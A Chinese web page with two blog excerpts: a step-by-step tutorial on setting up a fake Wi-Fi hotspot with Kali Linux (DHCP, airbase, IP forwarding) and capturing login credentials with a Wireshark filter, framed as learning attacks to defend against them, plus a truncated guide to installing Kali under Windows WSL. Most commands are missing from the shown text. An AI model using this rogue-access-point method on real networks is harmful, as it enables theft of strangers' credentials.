‍Wifi钓鱼是一种十分常见的网络安全风险, 黑客常利用虚假的免费wifi窃取用户数据。今天技术篇主要介绍如何利用渗透工具kali linux 进行wifi钓鱼,教程由我们的技术大牛赛博南Kenny出品,适合kali初学者服用,菜鸟小编初学时发现该教程十分有用。所谓知己知彼,百战百胜。只有我们知道了我们的网络是如何被攻击的,才能做出更好的防御措施。同时,温馨提示,大家不要随意连接公众场合的免费wifi哦,可能不小心就此泄露了个人信息。STEP 1Kali DHCP服务安装Kali在默认的情况下是没有DHCP服务的,这时就要进行安装,具体如下:STEP 2修改文件修改dhcpd.conf文件,使其内容如下:上面设置网关是10.0.0.1,DHCP地址池是10.0.0.10至10.0.0.100STEP 3无线网卡处理先在虚拟机上查看无线网卡名称,此次钓鱼使用的无线网卡名是waln0STEP 4建设无线热点使用airbase建设无线热点STEP 5热点流量虚至网卡热点的网络流量会被虚拟到at0这块网卡上面STEP 6IP转发STEP 7查看伪造Wi-fi情况信号还挺好的嘛~‍STEP 8获取数据包开启Wireshark开启Wireshark并对at0进行抓包,并对数据包进行筛选ip.addr eq 10.0.0.10 and tcp.port==143 and frame contains “LOGIN”版权所有/赛博南kenny小编/赛博克里斯,赛博慧 本文始发于微信公众号(赛博星人):【技术篇】利用渗透工具kali linux进行wifi钓鱼
阅读全文
在Windows 10的linux子系统中安装完整版kali 安全闲碎

在Windows 10的linux子系统中安装完整版kali

0x01 准备工作需要安装:Git Bash ,Python 3 https://git-scm.com/download/win Git Bash https://www.python.org/downloads/windows/ Python 3Windows 10 操作系统首先需要安装Git bash和Python 3,其实Git bash 并不是必须的,安装Git bash是为了Git clone方便,不用下载Zip包。 Python 3是必须要安装的。0x02 安装Kali Linux子系统首先使用管理员权限打开一个Powershell。点击 左下角“阅读原文” 输入阅读密码:2157 查看完整版!更多精彩内容,敬请加入DMZLab交流圈!扫描下图二维码,关注DMZLab公众号,精彩内容不错过! 本文始发于微信公众号(DMZLab):在Windows 10的linux子系统中安装完整版kali
阅读全文